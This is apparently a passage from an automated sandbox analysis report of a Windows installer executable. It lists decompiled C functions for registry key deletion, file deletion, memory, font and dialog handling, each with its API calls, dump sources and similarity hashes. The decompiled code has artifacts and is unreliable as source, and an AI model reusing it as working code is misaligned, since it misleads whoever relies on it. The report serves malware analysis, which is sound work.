					 *((intOrPtr*)(_t56 - 4)) = 1;
				}
				_push(_t51);
				E00401423();
				 *0x4247e8 =  *0x4247e8 +  *((intOrPtr*)(_t56 - 4));
				return 0;
			}

0x004027df
0x004027e1
0x004027ed
0x004027f0
0x004027fa
0x004027fe
0x004027fe
0x00402804
0x00402811
0x00402819
0x0040281c
0x00402822
0x00402830
0x00402835
0x00402839
0x0040283c
0x00402845
0x00402851
0x00402855
0x00402858
0x00402862
0x00402887
0x00402869
0x0040286e
0x00402876
0x0040287c
0x00402881
0x00402881
0x0040288e
0x0040288e
0x0040289b
0x004028a1
0x004028b3
0x004028b3
0x004028b9
0x004028b9
0x004028c4
0x004028c5
0x004028c9
0x004028cd
0x004028d3
0x004028d3
0x004028da
0x004022dd
0x00402a5d
0x00402a69

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402833
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 0040284F
GlobalFree.KERNEL32(?), ref: 0040288E
GlobalFree.KERNEL32(00000000), ref: 004028A1
CloseHandle.KERNEL32(?), ref: 004028B9
DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004028CD

Memory Dump Source

Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2162154870.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162181596.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162217509.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162228489.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162238122.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162252001.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: 9472795047facdfc58deb84b31b226fbb417f33134a7d8d5be020c0554978550
Instruction ID: d0efecf462ec4b8749248d5ce184abccdfd1d8ac98bc27b14fb78a8abc9ee6f4
Opcode Fuzzy Hash: 9472795047facdfc58deb84b31b226fbb417f33134a7d8d5be020c0554978550
Instruction Fuzzy Hash: A5217C72800128BBDB216FA5CE48D9E7E79EF09364F10823EF461762E1C67949418BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00404AF5, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84
stringCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00404AF5(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t21;
				signed int _t22;
				void* _t29;
				void* _t31;
				void* _t32;
				void* _t41;
				signed int _t43;
				signed int _t47;
				signed int _t50;
				signed int _t51;
				signed int _t53;

				_t21 = _a16;
				_t51 = _a12;
				_t41 = 0xffffffdc;
				if(_t21 == 0) {
					_push(0x14);
					_pop(0);
					_t22 = _t51;
					if(_t51 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t41 = 0xffffffdd;
					}
					if(_t51 < 0x400) {
						_t41 = 0xffffffde;
					}
					if(_t51 < 0xffff3333) {
						_t50 = 0x14;
						asm("cdq");
						_t22 = 1 / _t50 + _t51;
					}
					_t23 = _t22 & 0x00ffffff;
					_t53 = _t22 >> 0;
					_t43 = 0xa;
					_t47 = ((_t22 & 0x00ffffff) + _t23 * 4 + (_t22 & 0x00ffffff) + _t23 * 4 >> 0) % _t43;
				} else {
					_t53 = (_t21 << 0x00000020 | _t51) >> 0x14;
					_t47 = 0;
				}
				_t29 = E004062BB(_t41, _t47, _t53,  &_v36, 0xffffffdf);
				_t31 = E004062BB(_t41, _t47, _t53,  &_v68, _t41);
				_t32 = E004062BB(_t41, _t47, 0x420d50, 0x420d50, _a8);
				wsprintfA(_t32 + lstrlenA(0x420d50), "%u.%u%s%s", _t53, _t47, _t31, _t29);
				return SetDlgItemTextA( *0x423f18, _a4, 0x420d50);
			}

0x00404afb
0x00404b00
0x00404b08
0x00404b09
0x00404b16
0x00404b1e
0x00404b1f
0x00404b21
0x00404b23
0x00404b25
0x00404b28
0x00404b28
0x00404b2f
0x00404b35
0x00404b35
0x00404b3c
0x00404b43
0x00404b46
0x00404b49
0x00404b49
0x00404b4d
0x00404b5d
0x00404b5f
0x00404b62
0x00404b0b
0x00404b0b
0x00404b12
0x00404b12
0x00404b6a
0x00404b75
0x00404b8b
0x00404b9b
0x00404bb7

APIs

lstrlenA.KERNEL32(00420D50,00420D50,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404A10,000000DF,00000000,00000400,?), ref: 00404B93
wsprintfA.USER32 ref: 00404B9B
SetDlgItemTextA.USER32(?,00420D50), ref: 00404BAE

Strings

PB, xrefs: 00404B85
%u.%u%s%s, xrefs: 00404B7D

Memory Dump Source

Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2162154870.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162181596.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162217509.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162228489.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162238122.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162252001.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s$PB
API String ID: 3540041739-838025833
Opcode ID: 3412c4a7531a78c99129b4ba82c7811b22dc935ff741013f23db2bb1ff9efe52
Instruction ID: 5179c0f035392565bdab74c0efbe7b8420b5ea1509705373073e4f645d5961bf
Opcode Fuzzy Hash: 3412c4a7531a78c99129b4ba82c7811b22dc935ff741013f23db2bb1ff9efe52
Instruction Fuzzy Hash: 6011B773A0412437DB10656D9C45FAE329CDB85374F25023BFA26F31D1E978DC1282E9

Uniqueness

Uniqueness Score: -1.00%

Function 00402CD0, Relevance: 7.6, APIs: 5, Instructions: 84
registryCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E00402CD0(void* __eflags, void* _a4, char* _a8, signed int _a12) {
				void* _v8;
				int _v12;
				char _v276;
				void* _t27;
				signed int _t33;
				intOrPtr* _t35;
				signed int _t45;
				signed int _t46;
				signed int _t47;

				_t46 = _a12;
				_t47 = _t46 & 0x00000300;
				_t45 = _t46 & 0x00000001;
				_t27 = E004060AE(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
				if(_t27 == 0) {
					if((_a12 & 0x00000002) == 0) {
						L3:
						_push(0x105);
						_push( &_v276);
						_push(0);
						while(RegEnumKeyA(_v8, ??, ??, ??) == 0) {
							__eflags = _t45;
							if(__eflags != 0) {
								L10:
								RegCloseKey(_v8);
								return 0x3eb;
							}
							_t33 = E00402CD0(__eflags, _v8,  &_v276, _a12);
							__eflags = _t33;
							if(_t33 != 0) {
								break;
							}
							_push(0x105);
							_push( &_v276);
							_push(_t45);
						}
						RegCloseKey(_v8);
						_t35 = E00406631(3);
						if(_t35 != 0) {
							return  *_t35(_a4, _a8, _t47, 0);
						}
						return RegDeleteKeyA(_a4, _a8);
					}
					_v12 = 0;
					if(RegEnumValueA(_v8, 0,  &_v276,  &_v12, 0, 0, 0, 0) != 0x103) {
						goto L10;
					}
					goto L3;
				}
				return _t27;
			}

0x00402cdb
0x00402ce4
0x00402ced
0x00402cf9
0x00402d02
0x00402d0c
0x00402d31
0x00402d37
0x00402d3c
0x00402d3d
0x00402d6d
0x00402d46
0x00402d48
0x00402d98
0x00402d9b
0x00000000
0x00402da1
0x00402d57
0x00402d5c
0x00402d5e
0x00000000
0x00000000
0x00402d66
0x00402d6b
0x00402d6c
0x00402d6c
0x00402d79
0x00402d81
0x00402d88
0x00000000
0x00402db1
0x00000000
0x00402d90
0x00402d1c
0x00402d2f
0x00000000
0x00000000
0x00000000
0x00402d2f
0x00402db7

APIs

RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402D24
RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402D70
RegCloseKey.ADVAPI32(?,?,?), ref: 00402D79
RegDeleteKeyA.ADVAPI32(?,?), ref: 00402D90
RegCloseKey.ADVAPI32(?,?,?), ref: 00402D9B

Memory Dump Source

Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2162154870.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162181596.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162217509.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162228489.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162238122.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162252001.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseEnum$DeleteValue
String ID:
API String ID: 1354259210-0
Opcode ID: 681fed8778fb2982ecb5527b851c998c3744aa6ef2e2e43ab789fcfdd1fcd395
Instruction ID: 3131e3f6e31e27b0aa66d3651422ecf58d36830b066a5e7c74bd8b9791dc988a
Opcode Fuzzy Hash: 681fed8778fb2982ecb5527b851c998c3744aa6ef2e2e43ab789fcfdd1fcd395
Instruction Fuzzy Hash: 21215771900108BBEF129F90CE89EEE7A7DEF44344F100476FA55B11A0E7B48F64AA68

Uniqueness

Uniqueness Score: -1.00%

Function 00401D65, Relevance: 7.6, APIs: 5, Instructions: 75
windowCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00401D65(void* __ebx, void* __edx) {
				struct HWND__* _t30;
				CHAR* _t38;
				void* _t48;
				void* _t53;
				signed int _t55;
				signed int _t58;
				long _t61;
				void* _t65;

				_t53 = __ebx;
				if(( *(_t65 - 0x1b) & 0x00000001) == 0) {
					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x20));
				} else {
					E00402BAC(2);
					 *((intOrPtr*)(__ebp - 0x38)) = __edx;
				}
				_t55 =  *(_t65 - 0x1c);
				 *(_t65 + 8) = _t30;
				_t58 = _t55 & 0x00000004;
				 *(_t65 - 0xc) = _t55 & 0x00000003;
				 *(_t65 - 0x34) = _t55 >> 0x1f;
				 *(_t65 - 0x30) = _t55 >> 0x0000001e & 0x00000001;
				if((_t55 & 0x00010000) == 0) {
					_t38 =  *(_t65 - 0x24) & 0x0000ffff;
				} else {
					_t38 = E00402BCE(0x11);
				}
				 *(_t65 - 8) = _t38;
				GetClientRect( *(_t65 + 8), _t65 - 0x84);
				asm("sbb edi, edi");
				_t61 = LoadImageA( ~_t58 &  *0x424740,  *(_t65 - 8),  *(_t65 - 0xc),  *(_t65 - 0x7c) *  *(_t65 - 0x34),  *(_t65 - 0x78) *  *(_t65 - 0x30),  *(_t65 - 0x1c) & 0x0000fef0);
				_t48 = SendMessageA( *(_t65 + 8), 0x172,  *(_t65 - 0xc), _t61);
				if(_t48 != _t53 &&  *(_t65 - 0xc) == _t53) {
					DeleteObject(_t48);
				}
				if( *((intOrPtr*)(_t65 - 0x28)) >= _t53) {
					_push(_t61);
					E00406186();
				}
				 *0x4247e8 =  *0x4247e8 +  *((intOrPtr*)(_t65 - 4));
				return 0;
			}

0x00401d65
0x00401d69
0x00401d7e
0x00401d6b
0x00401d6d
0x00401d73
0x00401d73
0x00401d84
0x00401d87
0x00401d91
0x00401d94
0x00401d9c
0x00401dad
0x00401db0
0x00401dbb
0x00401db2
0x00401db4
0x00401db4
0x00401dbf
0x00401dcc
0x00401df3
0x00401e02
0x00401e10
0x00401e18
0x00401e20
0x00401e20
0x00401e29
0x00401e2f
0x004029a5
0x004029a5
0x00402a5d
0x00402a69

APIs

GetDlgItem.USER32(?,?), ref: 00401D7E
GetClientRect.USER32 ref: 00401DCC
LoadImageA.USER32(?,?,?,?,?,?), ref: 00401DFC
SendMessageA.USER32 ref: 00401E10
DeleteObject.GDI32(00000000), ref: 00401E20

Memory Dump Source

Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2162154870.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162181596.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162217509.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162228489.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162238122.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162252001.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 6bf6946672e698bf1bfe4de63576d549b40da2e57045ab1ce7509431734d3278
Instruction ID: 488f83a01e3392fad3bf683b4443aaeb9baaf514c425c8ec37ca45fc88de17ea
Opcode Fuzzy Hash: 6bf6946672e698bf1bfe4de63576d549b40da2e57045ab1ce7509431734d3278
Instruction Fuzzy Hash: E9212A72E00109AFCF15DFA4DD85AAEBBB5EB88300F24417EF911F62A1CB389941DB54

Uniqueness

Uniqueness Score: -1.00%

Function 00401E35, Relevance: 7.5, APIs: 5, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E00401E35(intOrPtr __edx) {
				void* __esi;
				int _t9;
				signed char _t15;
				struct HFONT__* _t18;
				intOrPtr _t30;
				struct HDC__* _t31;
				void* _t33;
				void* _t35;

				_t30 = __edx;
				_t31 = GetDC( *(_t35 - 8));
				_t9 = E00402BAC(2);
				 *((intOrPtr*)(_t35 - 0x38)) = _t30;
				0x40b820->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t31, 0x5a), 0x48));
				ReleaseDC( *(_t35 - 8), _t31);
				 *0x40b830 = E00402BAC(3);
				_t15 =  *((intOrPtr*)(_t35 - 0x18));
				 *((intOrPtr*)(_t35 - 0x38)) = _t30;
				 *0x40b837 = 1;
				 *0x40b834 = _t15 & 0x00000001;
				 *0x40b835 = _t15 & 0x00000002;
				 *0x40b836 = _t15 & 0x00000004;
				E004062BB(_t9, _t31, _t33, 0x40b83c,  *((intOrPtr*)(_t35 - 0x24)));
				_t18 = CreateFontIndirectA(0x40b820);
				_push(_t18);
				_push(_t33);
				E00406186();
				 *0x4247e8 =  *0x4247e8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}

0x00401e35
0x00401e40
0x00401e42
0x00401e4f
0x00401e66
0x00401e6b
0x00401e78
0x00401e7d
0x00401e81
0x00401e8c
0x00401e93
0x00401ea5
0x00401eab
0x00401eb0
0x00401eba
0x00402620
0x00401569
0x004029a5
0x00402a5d
0x00402a69

APIs

GetDC.USER32(?), ref: 00401E38
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E52
MulDiv.KERNEL32 ref: 00401E5A
ReleaseDC.USER32(?,00000000), ref: 00401E6B
CreateFontIndirectA.GDI32(0040B820), ref: 00401EBA

Memory Dump Source

Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2162154870.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162181596.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162217509.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162228489.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162238122.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162252001.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID:
API String ID: 3808545654-0
Opcode ID: 58c68d17d92a7b2530b6f57be575cc9bfeb44b1e921b0f803df6e483c56fd12b
Instruction ID: 5097186ed897f0bb8f2c49de76e9dd96fe00b68d7cb2a8ba7479d5b6a1f75869
Opcode Fuzzy Hash: 58c68d17d92a7b2530b6f57be575cc9bfeb44b1e921b0f803df6e483c56fd12b
Instruction Fuzzy Hash: 18014072504344AEE7017BA4AE89B9A7FF8E755701F10547AF141B61F2CB790445CB6C

Uniqueness

Uniqueness Score: -1.00%

Function 00401C2E, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84
windowtimeCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00401C2E(intOrPtr __edx) {
				int _t29;
				long _t30;
				signed int _t32;
				CHAR* _t35;
				long _t36;
				int _t41;
				signed int _t42;
				int _t46;
				int _t56;
				intOrPtr _t57;
				struct HWND__* _t61;
				void* _t64;

				_t57 = __edx;
				_t29 = E00402BAC(3);
				 *((intOrPtr*)(_t64 - 0x38)) = _t57;
				 *(_t64 - 8) = _t29;
				_t30 = E00402BAC(4);
				 *((intOrPtr*)(_t64 - 0x38)) = _t57;
				 *(_t64 + 8) = _t30;
				if(( *(_t64 - 0x14) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 8)) = E00402BCE(0x33);
				}
				__eflags =  *(_t64 - 0x14) & 0x00000002;
				if(( *(_t64 - 0x14) & 0x00000002) != 0) {
					 *(_t64 + 8) = E00402BCE(0x44);
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x2c)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t59 = E00402BCE();
					_t32 = E00402BCE();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t35 =  ~( *_t31) & _t59;
					__eflags = _t35;
					_t36 = FindWindowExA( *(_t64 - 8),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
					goto L10;
				} else {
					_t61 = E00402BAC();
					 *((intOrPtr*)(_t64 - 0x38)) = _t57;
					_t41 = E00402BAC(2);
					 *((intOrPtr*)(_t64 - 0x38)) = _t57;
					_t56 =  *(_t64 - 0x14) >> 2;
					if(__eflags == 0) {
						_t36 = SendMessageA(_t61, _t41,  *(_t64 - 8),  *(_t64 + 8));
						L10:
						 *(_t64 - 0xc) = _t36;
					} else {
						_t42 = SendMessageTimeoutA(_t61, _t41,  *(_t64 - 8),  *(_t64 + 8), _t46, _t56, _t64 - 0xc);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x28)) - _t46;
				if( *((intOrPtr*)(_t64 - 0x28)) >= _t46) {
					_push( *(_t64 - 0xc));
					E00406186();
				}
				 *0x4247e8 =  *0x4247e8 +  *((intOrPtr*)(_t64 - 4));
				return 0;
			}

0x00401c2e
0x00401c30
0x00401c37
0x00401c3a
0x00401c3d
0x00401c47
0x00401c4b
0x00401c4e
0x00401c57
0x00401c57
0x00401c5a
0x00401c5e
0x00401c67
0x00401c67
0x00401c6a
0x00401c6e
0x00401c70
0x00401cc5
0x00401cc7
0x00401cd0
0x00401cd8
0x00401cdb
0x00401cdb
0x00401ce4
0x00000000
0x00401c72
0x00401c79
0x00401c7b
0x00401c7e
0x00401c84
0x00401c8b
0x00401c8e
0x00401cb6
0x00401cea
0x00401cea
0x00401c90
0x00401c9e
0x00401ca6
0x00401ca9
0x00401ca9
0x00401c8e
0x00401ced
0x00401cf0
0x00401cf6
0x004029a5
0x004029a5
0x00402a5d
0x00402a69

APIs

SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C9E
SendMessageA.USER32 ref: 00401CB6

Strings

!, xrefs: 00401C6A

Memory Dump Source

Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2162154870.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162181596.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162217509.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162228489.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162238122.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162252001.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: fd1638e98ba6d3c211dbcd30864b3267bbc4afbfdbf9ed1ecbf77a0a26ee8f5b
Instruction ID: 90c6e89302a946556e44a8134fdeeaca46b2157ebe1368c161caa9607488c25b
Opcode Fuzzy Hash: fd1638e98ba6d3c211dbcd30864b3267bbc4afbfdbf9ed1ecbf77a0a26ee8f5b
Instruction Fuzzy Hash: 80216071A44208BEEB05DFB5D98AAAD7FB4EF44304F20447FF502B61D1D6B88541DB28

Uniqueness

Uniqueness Score: -1.00%

Function 00405BC0, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405BC0(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x40a014);
				}
				return _t7;
			}

0x00405bc1
0x00405bd8
0x00405be0
0x00405be0
0x00405be8

APIs

lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040344E,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403673,?,00000007,00000009,0000000B), ref: 00405BC6
CharPrevA.USER32(?,00000000), ref: 00405BCF
lstrcatA.KERNEL32(?,0040A014,?,00000007,00000009,0000000B), ref: 00405BE0

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405BC0

Memory Dump Source

Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2162154870.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162181596.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162217509.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162228489.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162238122.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162252001.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-4017390910
Opcode ID: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
Instruction ID: d6a8f4146c737b4c1111608fba26ea94f920a63204c4a5504a78fba285be9fad
Opcode Fuzzy Hash: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
Instruction Fuzzy Hash: 2CD0A7721055307BD21237154C09ECF2A488F0230470A006BF541B6191C73C5C1187FE

Uniqueness

Uniqueness Score: -1.00%

Function 00405C59, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405C59(CHAR* _a4) {
				CHAR* _t5;
				char* _t7;
				CHAR* _t9;
				char _t10;
				CHAR* _t11;
				void* _t13;

				_t11 = _a4;
				_t9 = CharNextA(_t11);
				_t5 = CharNextA(_t9);
				_t10 =  *_t11;
				if(_t10 == 0 ||  *_t9 != 0x3a || _t9[1] != 0x5c) {
					if(_t10 != 0x5c || _t11[1] != _t10) {
						L10:
						return 0;
					} else {
						_t13 = 2;
						while(1) {
							_t13 = _t13 - 1;
							_t7 = E00405BEB(_t5, 0x5c);
							if( *_t7 == 0) {
								goto L10;
							}
							_t5 = _t7 + 1;
							if(_t13 != 0) {
								continue;
							}
							return _t5;
						}
						goto L10;
					}
				} else {
					return CharNextA(_t5);
				}
			}

0x00405c62
0x00405c69
0x00405c6c
0x00405c6e
0x00405c72
0x00405c87
0x00405ca6
0x00000000
0x00405c8e
0x00405c90
0x00405c91
0x00405c94
0x00405c95
0x00405c9d
0x00000000
0x00000000
0x00405c9f
0x00405ca2
0x00000000
0x00000000
0x00000000
0x00405ca2
0x00000000
0x00405c91
0x00405c7f
0x00000000
0x00405c80

APIs

CharNextA.USER32(?), ref: 00405C67
CharNextA.USER32(00000000), ref: 00405C6C
CharNextA.USER32(00000000), ref: 00405C80

Strings

C:\Users\user\AppData\Local\Temp\nsrB9DF.tmp, xrefs: 00405C5A

Memory Dump Source

Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2162154870.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162181596.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162217509.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162228489.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162238122.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162252001.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID: CharNext
String ID: C:\Users\user\AppData\Local\Temp\nsrB9DF.tmp
API String ID: 3213498283-2717606532
Opcode ID: 822f20ec9a8b35058aaebb4724fdb7f7397eab756ad02150ec19b841d432d8ed
Instruction ID: 9a9653d8387983e914f74c1f8e9a863a5ef5a61ad4bce0684ac50a06ae96742d
Opcode Fuzzy Hash: 822f20ec9a8b35058aaebb4724fdb7f7397eab756ad02150ec19b841d432d8ed
Instruction Fuzzy Hash: 70F06291D0CF612BFB3256684C84B775E88CB55359F18407BDA80EA2C1C27C58808B9A

Uniqueness

Uniqueness Score: -1.00%

Function 00403949, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403949() {
				void* _t1;
				void* _t2;
				signed int _t11;

				_t1 =  *0x40a018; // 0x184
				if(_t1 != 0xffffffff) {
					CloseHandle(_t1);
					 *0x40a018 =  *0x40a018 | 0xffffffff;
				}
				_t2 =  *0x40a01c; // 0x188
				if(_t2 != 0xffffffff) {
					CloseHandle(_t2);
					 *0x40a01c =  *0x40a01c | 0xffffffff;
					_t11 =  *0x40a01c;
				}
				E004039A6();
				return E004059F0(_t11, "C:\\Users\\Albus\\AppData\\Local\\Temp\\nsrB9DF.tmp", 7);
			}

0x00403949
0x00403958
0x0040395b
0x0040395d
0x0040395d
0x00403964
0x0040396c
0x0040396f
0x00403971
0x00403971
0x00403971
0x00403978
0x0040398a

APIs

CloseHandle.KERNEL32(00000184), ref: 0040395B
CloseHandle.KERNEL32(00000188), ref: 0040396F

Strings

C:\Users\user\AppData\Local\Temp\nsrB9DF.tmp, xrefs: 0040397F
C:\Users\user\AppData\Local\Temp\, xrefs: 0040394E

Memory Dump Source

Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2162154870.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162181596.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162217509.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162228489.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162238122.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162252001.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseHandle
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsrB9DF.tmp
API String ID: 2962429428-4265787733
Opcode ID: 462e3e9a24158b25b8329b1cd15e1f965bb5a7db837425cedf417ff9a75e81db
Instruction ID: e7b4e10e42ecc32fc510515b664fd575b34ef2c347d966a0cc54db6954a3096e
Opcode Fuzzy Hash: 462e3e9a24158b25b8329b1cd15e1f965bb5a7db837425cedf417ff9a75e81db
Instruction Fuzzy Hash: 6AE08C71944B1896C130AF7CAD4E9953B1C9B413367244726F078F20F0C7789AA75AEE

Uniqueness

Uniqueness Score: -1.00%

Function 004052C3, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46
windowCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E004052C3(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						if(_t15 == 0x419 &&  *0x420d3c != _t16) {
							_push(_t16);
							_push(6);
							 *0x420d3c = _t16;
							E00404C7F();
						}
						L11:
						return CallWindowProcA( *0x420d44, _a4, _t15, _a12, _t16);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404BFF(_a4, 1);
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
